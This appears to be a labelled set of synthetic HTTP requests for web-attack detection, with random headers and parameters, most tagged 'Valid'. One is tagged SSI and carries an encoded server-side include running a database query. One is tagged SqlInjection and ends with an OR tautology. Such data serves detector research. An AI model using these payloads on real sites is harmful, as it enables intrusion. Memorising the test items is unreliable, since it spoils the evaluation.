Content-Location: /dchy/aIon5s/onAenr.rar
Content-MD5: aG5lZWJlT2N0YW9wcGVybA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 10:59:01 GMT
Last-Modified: Wed, 11 Oct 06 22:13:34 CET
Host: www.hmrnm5shdt.uk
Connection: keep-alive
Accept: text/*;q=0.3, application/*
Accept-Charset: windows-1254;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 157.21.100.224
Cookie: aoinskett=u8mesurDT;otmtrpnee=ievegtyiqtvhMeaee;bttd4xhitfqin=a8ite(te3;ay2n=itsd
Cookie2: $Version="47"
Date: Mon, 10 Oct 05 07:16:54 GMT
ETag: W/"lOSQGp7vOsjCtnp"
Expect: 100-continue
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Sat, 29 Dec 07 04:08:38 GMT
If-Unmodified-Since: Fri, 27 May 05 02:15:29 CET
If-Match: *
If-None-Match: "eUjEl0KCsMbgzC4v7"
If-Range: "38WOfpIo_UE@WT6-s0"
Max-Forwards: 2612
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.zela.st/1WrnB/mtdtwe/iaqnyt/yrof/oSta1uHi.pdf
Authorization: 7fnwt eatlI=evAengaa
Range: 3-853722,-06527
Referer: /3Sraee/1opoed.png
TE: deflate;q=0.4
Trailer: Proxy-Authorization
User-Agent: ypDefopen3alwsRl
UA-CPU: MIPS
UA-Disp: 9466,026,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0276x3141
Via: FTP/8.4 www.yrsen.html, 5.4 www.k7taa.png, 3.7 www.audlaa.jpg:9
Transfer-Encoding: deflate
Upgrade: ra0Hnd/6.8, eyae/3.6, Irhtn/4.9, eltrm/8.5, ilhi/1.9
Warning: 140 www.ner7.gif:28 "tvurexwIb0Sdxnss3ae" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 27219
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

hrheehtult=3493914&4d6m=t =stS '&ednrelnrgebemb=80&glskte3teeeloas=3465&kch9=99&sdilious=eX0Fq3YHdN&sgq3aaaiaya9rai=rcpnc insert

End - Id: 6259
Start - Id: 23101
class: Valid
GET /h3/baeddne750ejdrhSoa/kFokaf/a9dLKpassthruA4jU3_Ht/lam@.WeDaZ9nnAv7_Zk/vwtcsttko/Tljf/E7Ns/9r@2CgU.mdb? HTTP/1.0
Host: 239.9.3.197:80
Connection: im2bHura
Accept: application/*;q=0.8, video/*, text/plain;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.0, gzip;q=0.3, identity;q=0.5, compress;q=0.7
Accept-Language: *
Cache-Control: cfdg='r'
Client-ip: 164.78.31.224
Cookie: ponyostpN=5059;sh8neos6tEFTerl=8gy7e;e6e5veonna3e=4tSit6rEmh;9u=adF4pXLW;di=eiSaiiutcphjhfjle;7datcmA=+sse>Ee/r
Cookie2: $Version="505"
Date: Wed, 16 Jun 04 18:14:55 GMT
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: 1n9t=7ked;nliad=tiEirie7
From: Hocan@osthutarg1.biz
If-Modified-Since: Thu, 16 Jun 05 03:11:57 CET
If-Unmodified-Since: Thu, 20 Jan 05 21:49:59 CET
If-Match: *
If-None-Match: "EPLpJf_Dkh.jwVycW"
If-Range: Fri, 30 Sep 05 05:52:48 UTC
Max-Forwards: 0
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM QWR0dGRlY2Fhc2Rkb2hzbDFlcmU5YnB1N2FoaWlyYThv
Range: 189-,863-
Referer: /anleshei.ace
TE: trailers,gzip;q=0.2,trailers
Trailer: Accept
User-Agent: a8_x8r http://www.xeyBce.cz
UA-CPU: Sparc
UA-Disp: 784,1462,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: FTP/5.5 68.48.17.176
Transfer-Encoding: compress
Upgrade: lN4/4.1, mlbe/9.6, leIed/9.3, per0s/1.6
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 73.70.52.35
X-Serial-Number: 18684889581671575
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23101
Start - Id: 18866
class: Valid
GET /cdm99CMSvwDSQQu.aspx?3RieliaynE1=4250&erftjoueh=89646012&tsOcmy7u=7357034&jVlnie=stdineeb%3Fe&tLhsQhotrkiE=iIpvo HTTP/1.1
Host: www.uokmPe7uar.com
Connection: close
Accept: audio/*, video/quicktime;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 82.233.191.39
Cookie: rci=Eqtcdro;oztsne=tafqatGsrouobhya
Cookie2: $Version="71"
Date: Thu, 22 Feb 07 23:50:24 UTC
ETag: "MHHSCRN0UYv5T3YfADCy"
Expect: 100-continue
From: mogs@imsit.st
If-Modified-Since: Sun, 06 Jan 08 12:09:20 GMT
If-Unmodified-Since: Mon, 02 Feb 09 02:51:37 GMT
If-Match: "vS2iWi2qPEZ.vB70f"
If-None-Match: "jzUYyKpHLYv5E4a"
If-Range: Mon, 09 Aug 04 06:16:06 GMT
Max-Forwards: 50
MIME-Version: 5.7
Pragma: qet=lsh
Proxy-Authorization: Digest nc=DEbC6f96
Authorization: Digest realm
Range: 33-,46-263308
Referer: http://yhneh.cz/eisuhsny/8de7o/amJror.js
TE: trailers
Trailer: Host
User-Agent: SaiA7rcitH70a5S
UA-CPU: PowerPC
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 754x840
Via: FTP/1.2 167.233.47.24
Transfer-Encoding: aKDnst
Upgrade: sst/1.2, yoeg/0.2, eryeo/8.7, fnres/9.9
Warning: 951 www.irwnsd.tiff "9rmmauuilegoneDwol22" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 65367829353425279089
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18866
Start - Id: 22385
class: Valid
GET /meU0qSz.20I2BWiLSgX/o1.eaT/UbgsoundVlocationE/kceaeutensi/fwindow.open/kUOAmyjI-xRRMjE_L.php3?yh8sk6Rft8eo=ngiad+&9UDOj.=wj5f&ca=r4v7UU7m&eheotit1o9d=%40hza&benntimpiOs=3p33NE&uw97u=4891893909&rchaIac5=eorstylel&1ziunltfdss=w2nkK22sfK&namkn=m4ienepu%25uitr9x&EadbblenhucseEp=648&YO=88&ioWtwhere=iconnectiyd+%29%3Fo%3Do%24t4ga6v&sucldtnd=tce&J4j-ne2W=300369&GQQ8K=eiyer8l5engndsr HTTP/1.0
Host: 121.117.79.127
Connection: close
Accept: */*;q=0.1
Accept-Charset: utf-7;q=0.5, iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 231.247.76.251
Cookie: eel=9;cntltness=nHcdBtED8;stkatqntiwozn=205791;eeydwnIgmt9a=a@p i  autoexec';sknf3an=lDu3tqp0un
Cookie2: $Version="107"
Date: Sat, 15 Sep 07 03:34:34 UTC
ETag: W/"Y5RGtFB@yPNp@.6@drPI"
Expect: 100-continue
From: Thg1b@weOoea0a.org
If-Modified-Since: Fri, 12 Jan 07 24:47:16 GMT
If-Unmodified-Since: Tue, 26 Jul 05 20:21:49 UTC
If-Match: "vLC@DcwS3c7yKgUyD"
If-None-Match: *
If-Range: Fri, 11 May 07 04:32:20 UTC
Max-Forwards: 1827
MIME-Version: 2.1
Pragma: 6ea='tye'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: mgs7 rljd4ng=R36nzmnH
Range: 27-495
Referer: http://www.20msAeM.com/U6adcux5/wnueh/cuTeg.mdb
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 5.8; w1-ot; rv:2.6.7) Gecko/44181579
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: 85zs/3.2 www.Eet4cS.jpeg
Transfer-Encoding: compress
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22385
Start - Id: 4303
class: Valid
PUT /9bjgNsd2edokrtel3/nR5MFCMdEOEsfVmAl/yMTYuLokHmXtE4BGH1bu.cfm? HTTP/1.0
Content-Length: 155
Content-Language: sea,oa
Content-Encoding: deflate
Content-Location: /itgowt/ertis/YWiAIzux.fgf
Content-MD5: NmtyZWlocWV0bGRsdnIweQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Nov 06 05:37:35 GMT
Last-Modified: Tue, 05 Apr 05 07:49:31 GMT
Host: www.tiinta.net
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 74.217.52.222
Cookie: uNat=d7iM;i1sn8Ntxr=sl_21uG4ghXj;mchxeeriu0=wp2tTnrn
Cookie2: $Version="33"
Date: Mon, 28 Mar 05 22:05:53 CET
ETag: W/"dbby6YCFqBlhFLbKDSG"
Expect: 100-continue
From: hniryitt@cesrtata.de
If-Modified-Since: Sat, 08 Apr 06 22:08:21 CET
If-Unmodified-Since: Sat, 29 Jul 06 16:26:41 GMT
If-Match: "P0G46BWtoWZaf5s_e"
If-None-Match: "9DgdlUbdroZY_EVodW"
If-Range: *
Max-Forwards: 95
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: utcbmb 1ade57=6afgps
Authorization: p80ns 1yi1e=mona0
Range: -373,539-
Referer: http://www.i34br.uk/hlhc9/sniEe/krdorEae/Schcn9ap/tnepoogb.gif
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/8.1 (compatible; Konqueror/1.7; Win98; ewbmn5fe; laricoea; beriit)
UA-CPU: Sparc
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x229
Via: tia/2.0 118.30.247.21, 2.0 117.51.184.134
Transfer-Encoding: identity
Upgrade: Unh/4.4
Warning: 846 www.nhhniif.png:683 "gqagflteYemlOnn5rmee" 
X-Forwarded-For: 132.110.249.171
X-Serial-Number: 41906
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hl=ta6pniqrIpassthru6gb@ &sfaviy2bezi=ndQ9nuJM34E&2pea3ttfcec=wse&2r5teSziy=3720&tstr4xaess=9&e9adMlfi=mt_&3cn=52222&emhstaihs=623291464&oedpWinl=zlie rO

End - Id: 4303
Start - Id: 14059
class: Valid
GET /otipxmN/mx/trso/5otdaorjeiee2Lcto/EOb4b2cf/aksB/s8WHFYLOG_B/rn9oEaDiblSt/gsersiyna/ooahekgtpsrhahs.swf?cb8FchildxE1c=74683693&Ee2=93054000&tev=da&Eo=d&hTnb9BfoecM=xByg&jpt4wspi7eelgt=hdOwip%3CApg%5C&3rtohmyrn=mvdadminu&jhfsOIiei5ch=%24iDi257E3%3Aca&JrPjfy@=amuu&hnixsisa=95013586&kdWl03.7Q=arhpt&idi=nrHonorheTlaDeTle HTTP/1.1
Host: www.cloo1d.cz:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a35-a, Edde-hra, 5alr-9hdsne;q=0.1
Cache-Control: max-age=62
Client-ip: 227.127.75.96
Cookie: xiweMawoesr=oeTioar1doeeersr;cju=Aseformaki;aRFBDu_ht=6TbBOs_B1A6;iAae1A0slcnih=h~ear;5tjg=naedyek3hncrets7
Cookie2: $Version="956"
Date: Sat, 10 Sep 05 16:16:57 GMT
ETag: "xJgDFrtgEse3-36SW0OR"
Expect: s1yT=3iet
From: en4oTvbI@e0stef1.cz
If-Modified-Since: Sat, 16 Aug 08 12:30:47 CET
If-Unmodified-Since: Mon, 11 Dec 06 02:48:12 GMT
If-Match: "INIbM3k@bDQka1vfx"
If-None-Match: "rIVbsWU89WX9ljGTqy"
If-Range: *
Max-Forwards: 204
MIME-Version: 2.1
Pragma: tj=uthv
Proxy-Authorization: NTLM OG9zZXlhOHNlZWxlaXRDNGpydGFFb05sNUUxdHI0YWRUczhuOHVJbGh5
Authorization: Basic TWgyY2lnOmtlZWNjbQ==
Range: 477582-,-394214
Referer: http://www.wbin.de/cqeL/arrnIi/nnLti/Dhtt/aueufui.jsp
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.1 (compatible; uElo6gk; Open BSD i386; eothcpey1e; jtleu; n51ti3emm)
UA-CPU: Sparc
UA-Disp: 091,777,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9552x9727
Via: FTP/1.3 www.aole.png:80, 7.0 www.GaIo.tiff
Transfer-Encoding: gzip
Upgrade: f5esqa/4.6, oCCert/1.3, oteo/4.6, Tlf/5.9, inth/5.5
Warning: 980 www.mem2oh.html "iEatsey" "Sat, 25 Sep 04 08:44:30 CET"
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 4933841069296
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14059
Start - Id: 1230
class: Valid
GET /PM1_9XWeIa0dKnwp-/XW-/e2kgh/s2/isystemE-8iframeTRDR3Dj/1ooaaoh/aoauxeq@HKQt4or5dC/gfoe1f37iectockicine/nEcmeF.shtml?8a=oK0v1JfpvUkY&mtzna0sDET=031378&nRsh=4794048919&suptctomtniiia=8967731 HTTP/1.0
Host: www.edtai7uor.uk:01
Connection: close
Accept: text/*;q=0.1
Accept-Charset: shift_jis;q=0.6
Accept-Encoding: compress;q=0.8, identity, gzip, compress;q=0.8
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 43.91.142.232
Cookie: ctntlryabzl2=eui\tzevo?;eorartr=do
Cookie2: $Version="6"
Date: Thu, 11 Sep 08 22:09:41 UTC
ETag: "zTJE094zUpkJtZx4_"
Expect: cch3hnm
From: rrss18n@ElE01poue.cz
If-Modified-Since: Fri, 02 Mar 07 13:54:54 UTC
If-Unmodified-Since: Thu, 09 Oct 08 04:26:05 UTC
If-Match: *
If-None-Match: "k.4SbJ0f7iSkHRCtnd"
If-Range: "lW.5@mZFhsFV7mMS"
Max-Forwards: 42
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: Digest cnonce="Tipn"
Range: -709
Referer: http://8uasine8.biz/nmdeft.wav
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.9 (compatible; usdoesear; Linux i386; ret6hys; laih)
UA-CPU: PowerPC
UA-Disp: 092,1496,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6040x9780
Via: FTP/3.7 17.115.187.190
Transfer-Encoding: deflate
Upgrade: mhhiae/2.3, o5di/2.6, 33oh/6.7, al6m/0.6, tle6nh/6.1
Warning: 773 137.202.170.148 "wemeb1trtts" "Tue, 16 Oct 07 10:58:18 UTC"
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 326327
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 1230
Start - Id: 40842
class: SSI
GET /48FReOmOieyuR-KXFk/osnnesiggatLmr0T/ewAF47-UK/sLkHxZ90S/n0ARuH-lrLqUZM/saqLpbe/tc4AmtsnsHtl/dErR/63iUSnuD7K3l/or/tdKNS@CC_5oe7mTn.a2/rN.05EFyfeg.php4?Pw_ZAZJform7=68&asetot=duowbodywtpluhisu&twAca=188&3sd4teres=28173340&oufige2Nsea=20920261&Ia5asiuidl=ae&tapoiwpr=7440&wn8ivoiwh=sf&esgaRfrHsuenu0=3362&djuep0mnc0vin=01802&ha=%3C%21--%23odbc+connect%3D%22hstcHrw%2Cs2e%2CaSel%22+++++++statement%3D%22select+*++from+pet%22--%3E&iduUtbje8m1y=50&eys=nfEj4XZszI9M&e6rj7=erg%25uUAInc3%28t%3Essock_streamerrcpo%28&auHfobae=5019813117 HTTP/1.0
Host: www.mHoab.de
Connection: wnTkoht
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress, gzip, identity
Accept-Language: it9eora3-eH8F;q=0.1
Cache-Control: no-store
Client-ip: 75.99.25.245
Cookie: hnet=yvN;gu=y4wvsE2F
Cookie2: $Version="6"
Date: Fri, 17 Apr 09 06:41:24 CET
ETag: W/"x_WgFNlnOH.LYnJBB"
Expect: un3h
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Thu, 28 Jan 10 03:39:01 GMT
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: "2@36uUJdAP9vXDy"
If-None-Match: *
If-Range: Fri, 07 Apr 06 23:24:03 CET
Max-Forwards: 7134
MIME-Version: 9.0
Pragma: stseT='3V'
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 68-,5-
Referer: http://ciel.net/uidrj/locs.swf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.9 (X11; U; Unix 2.2; ne-2e; rv:7.9.0) Gecko/73824404
UA-CPU: PowerPC
UA-Disp: 7505,615,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: 9.1 www.syeee4.htm, HTTP/5.5 21.211.108.139, Aeo5on/8.3 213.101.214.233
Transfer-Encoding: gzip
Upgrade: smTMae/0.2
Warning: 883 62.123.51.153 "ctiihnf6soVui" "Wed, 19 Jan 05 12:07:07 CET"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 74867865064229
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40842
Start - Id: 8559
class: Valid
GET /uAsQoPcjxLKRT/rrow4jeCa/cLj/bADntEtNhgsuta1s5twl/l1a2KEpDugnXQz6jlB-F.jsp?nOgEd=697&@nqzlj=zaccess_log7%7C&A8InhTneiefcne=ono&6Vt-YCfPgp3=dhAio%3CeTfSf%3E&oodqrecgrei=aan HTTP/1.0
Host: www.dayia.net:6
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.0
Accept-Language: *
Cache-Control: max-stale=7537
Client-ip: 133.24.95.115
Cookie: os=surs=at;ruDisa7N4o=ctTmeebze;tmpQPqlsS4insertmZW=815
Cookie2: $Version="6"
Date: Thu, 05 Oct 06 16:27:26 GMT
ETag: W/"xDX2W8T9A@lrb-.t"
Expect: 100-continue
From: hiao@Soldae.uk
If-Modified-Since: Wed, 09 Jun 04 18:56:44 UTC
If-Unmodified-Since: Mon, 12 May 08 04:18:31 UTC
If-Match: "p_c-boDzHAkmzmbIVyO"
If-None-Match: *
If-Range: Sat, 08 Jan 05 14:20:28 UTC
Max-Forwards: 605
MIME-Version: 2.8
Pragma: Tsc='kf6e'
Proxy-Authorization: Digest qop=8dbndemk
Authorization: NTLM ZWpKdkV0QWUwZVptdjc4amFjRW5lZG53MnRhYWZ6RWVoaXI=
Range: 42276-,673-
Referer: /ennTr.asp
TE: trailers,trailers
Trailer: Pragma
User-Agent: n5ernfnsye/3.3.6.0
UA-CPU: Sparc
UA-Disp: 872,363,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 108x957
Via: 9ent/4.4 3.179.110.9
Transfer-Encoding: adcw
Upgrade: esa/9.9, odH0cg/5.0, y7e/2.0
Warning: 962 29.200.220.17:9962 "dseiv8noti" 
X-Forwarded-For: 170.20.120.214
X-Serial-Number: 1101244
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8559
Start - Id: 496
class: Valid
GET /3elebpite8ti/t7UZ/n7@Hk7p17OuqH4MCpMq/lJLj/ny4-XfFLDRr/nLj53UHYJCwH0.f_QCl.bin?snewp=IoRri-&eiA=L7sn93T HTTP/1.0
Host: www.mgrsge.uk:80
Connection: close
Accept: image/*, text/html;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eesad-n8fgd2on, ldear-sin;q=0.4, i-cco2;q=0.2, n0nd-rEm;q=0.3
Cache-Control: no-cache
Client-ip: 1.69.55.188
Cookie: bwe=selecteIs(ihbst0wiAn;ws0=812140;pprocessing-instructionor7copynfqqmB=bA_e3;mgdxodfnnf=mu4mV_
Cookie2: $Version="657"
Date: Sat, 06 Dec 08 13:09:34 UTC
ETag: W/"2jX3v6ODufFEfT4.U4"
Expect: 4hbnAv=e8b15;riTcolse
From: galnhlb@rtpbreUei.com
If-Modified-Since: Tue, 07 Jul 09 08:00:06 UTC
If-Unmodified-Since: Tue, 29 Jun 04 19:44:48 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Mar 09 12:01:39 UTC
Max-Forwards: 50
MIME-Version: 9.6
Pragma: c='xtutnht'
Proxy-Authorization: Basic ZW4yaWVhOm90ZFNv
Authorization: Digest response="fdd76acDc4315Bc57C3DaF1c3cd33AA6"
Range: 648-,41963-027
Referer: http://t3dmof.org/1eeais/leawa/taEewofs/nhhh/tuau.htm
TE: gzip;q=0.5,gzip,chunked;q=0.7
Trailer: If-Modified-Since
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 9.2; ho-ne; rv:3.1.6) Gecko/16316261
UA-CPU: StrongARM
UA-Disp: 506,620,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2278x9542
Via: 9.0 220.208.215.83, 2.9 www.rin25isI.jpg:31
Transfer-Encoding: gzip
Upgrade: aSogue/8.0, amz8to/3.6, rManti/2.8, samftt/0.2
Warning: 769 www.gierll.js "rannhdspleJh" "Wed, 04 Feb 04 16:03:11 GMT"
X-Forwarded-For: 66.116.137.221
X-Serial-Number: 9170010950
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 496
Start - Id: 41514
class: SqlInjection
PUT /ZexmlZ7bo_c%uIxji/yLt0Xo_P@I3zo1LwZ/pHzo44KIQ5/6aiitMR.1yz5ofv.atU/nUR.Ft0qJI1HFUD2j/sYCdSJLcw.sh? HTTP/1.1
Content-Length: 268
Content-Language: u0Itod7
Content-Encoding: deflate
Content-Location: /oEDol/1twErth/Boaeit/azsd/l1MAjfu.wav
Content-MD5: c3RvbnRpbnNUamFyYWhlOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Nov 09 17:26:35 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: www.eirirniet.cz
Connection: rhek7t
Accept: audio/*, image/*;q=0.2, image/*
Accept-Charset: utf-7, windows-1257, macintosh;q=0.3, iso-8859-4;q=0.4
Accept-Encoding: identity;q=0.2, deflate;q=0.5, deflate, identity
Accept-Language: i-N9iou, ip-tn;q=0.5, s2-rgdcl, e-Ii;q=0.3, saaa-th
Cache-Control: no-cache
Client-ip: 3.75.152.42
Cookie: eeEW=i05j.;Ssreclt=p_m4V;oro4klislShp= h
Cookie2: $Version="3"
Date: Mon, 01 Sep 08 09:48:19 CET
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Wed, 07 Apr 10 16:16:35 UTC
If-Unmodified-Since: Wed, 19 Dec 07 19:03:33 UTC
If-Match: "gIlzy-qb8CZSvls5F-FS"
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: Sat, 08 Mar 08 15:10:18 GMT
Max-Forwards: 5
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: Basic aEFyMzpVc2cwYm4=
Range: -507151,-0092
Referer: http://www.Cesa.uk/dlue/doijo.jpg
TE: trailers,deflate,chunked
Trailer: User-Agent
User-Agent: aS.mJJzFp@ http://www.3t5T.ch
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: aMeig3/4.7 www.edelerkf.png, 0.7 179.93.126.143:9, naa/7.5 www.IeGes.html:6832
Transfer-Encoding: compress
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o1tdeetUhhtc=eH-&aY8rAolihn=72546187&heLNOsoteR=7999124&LlEiccot=1&nc=26082050&tbhIseou9dtaloo=tj_dHXL1pJC&2lieym4at=819&soaon=glar&hmjigcTtD=iegleebYtai~w~bte d&tEmeaeionT=rtI&PVWAJYB=4betinnk/S&RQEfKdZA0LjI=OR  475756762755=475756762755&n4Imhx6eie=dSNsRaD4CF

End - Id: 41514
Start - Id: 21362
class: Valid
GET /Ef/iUnrs/epEIniwMEV1sxT/riletzAl/5updatewr7Cic1/rwcdocumentjIBcmdcKEY/hWQVwnF0eDLtIp92Te.jpg?rlTt89=m%3Ce%2Fhf%2Fb6&rspcs0Mdsi=yun&tlhnn=d%5Dsuvd4%3A&cotnrtr6=obtwiclckt&htKcph=ieie2tirforei%27&2re=H%28kss&wlfeI=r&eqseieem=nay&nlieb0gspan=Nr&eaggzlode=592&phpz5UL=sKSXXmkfw&wfryut=8&cAHe=9044551&5j2sdaefoEh=o7staEtneao&2hmsgctniBar=cgroup+bysstdinzh%28 HTTP/1.1
Host: www.1nahnswe.ch:7
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.6
Accept-Encoding: deflate;q=0.9, compress, identity;q=0.6
Accept-Language: *;q=0.0
Cache-Control: max-age=8156
Client-ip: 98.99.91.46
Cookie: efks=9476173
Cookie2: $Version="0"
Date: Sun, 05 Sep 04 02:20:30 GMT
ETag: W/"EbC1IoImO6uQn5K7TO"
Expect: nnts9sl=eerczEea
From: erbhednr@ieSiief.com
If-Modified-Since: Mon, 19 Dec 05 08:07:57 UTC
If-Unmodified-Since: Mon, 09 Apr 07 06:35:24 UTC
If-Match: ".v-ZydBNSK@VoPB"
If-None-Match: *
If-Range: Sat, 02 Jan 10 11:26:17 CET
Max-Forwards: 2
MIME-Version: 6.5
Pragma: rf='itseFtlt'
Proxy-Authorization: pdes tdeoj3=tuintwh
Authorization: Basic YWdzTnlObjpldHJqNw==
Range: -510,-15,91865-958
Referer: /rTnj/jetltiua/nDaelh9a/ieihhma2/rr6e.asp
TE: trailers
Trailer: Upgrade
User-Agent: muAiDUiRH http://www.krpfta.uk
UA-CPU: x86
UA-Disp: 9753,204,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1496x218
Via: FTP/6.1 www.tGrwinp.gif
Transfer-Encoding: compress
Upgrade: rhr/1.3, Smen/4.8, iZ2/9.9, 9env/2.8
Warning: 779 111.202.74.226 "loent" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21362
Start - Id: 18427
class: Valid
GET /qnduonled9terax/a3cPV55Ip@.exe? HTTP/1.1
Host: www.zRnetv.biz
Connection: keep-alive
Accept: audio/basic;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.7, gzip;q=0.6, identity, identity, identity;q=0.6
Accept-Language: *;q=0.1
Cache-Control: a=aiiuuxe
Client-ip: 188.106.227.101
Cookie: ttttReeaz=2686;oeaoheitiev1dln=chttpzy9;5oEtendeeH=omp\elITsih;adeewbner=845971
Cookie2: $Version="3"
Date: Fri, 07 Apr 06 02:53:41 CET
ETag: "MLsxUTIJ@Hd0@Mi-2"
Expect: iftEr5=soa9fL;oik4z=Suya
From: tln6d@eaei.gov
If-Modified-Since: Sat, 04 Jul 09 22:40:17 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:59:22 GMT
If-Match: *
If-None-Match: "QQEGEuE_crC@mkZuXI2"
If-Range: *
Max-Forwards: 8305
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: sXeeoh rDswg=isec
Range: 039-,2756-53,000-768
Referer: http://9hkheq.ch/eA4as/rtedh/5hra3r.txt
TE: chunked;q=0.5
Trailer: Transfer-Encoding
User-Agent: oohao4r (sVD@4S; s_O8qk5; e6u53Y2s_M; rr-XelBs; rEeGHNIo)
UA-CPU: MIPS
UA-Disp: 9580,4552,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4354x029
Via: 4.5 219.55.109.168, rrnses/6.1 196.6.98.229, 2.6 85.85.188.68
Transfer-Encoding: okAw5
Upgrade: er0ua/3.6
Warning: 667 www.dfn3lro.gif "uson3n" 
X-Forwarded-For: 94.17.82.121
X-Serial-Number: 562102259881666351
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18427
Start - Id: 19707
class: Valid
GET /mm8Ai/cE.dll?oi=phtpaogcstrPavui&ecs=eY%40XZXke3hg&Ygroup byoor0c1N0d=1w&MmGbrbinV6GVi=rs2%25&iSteejooohoBti=r%3EX&lgwsoetde=9643639 HTTP/1.1
Host: www.dsoHEso.st
Connection: keep-alive
Accept: */*;q=0.1
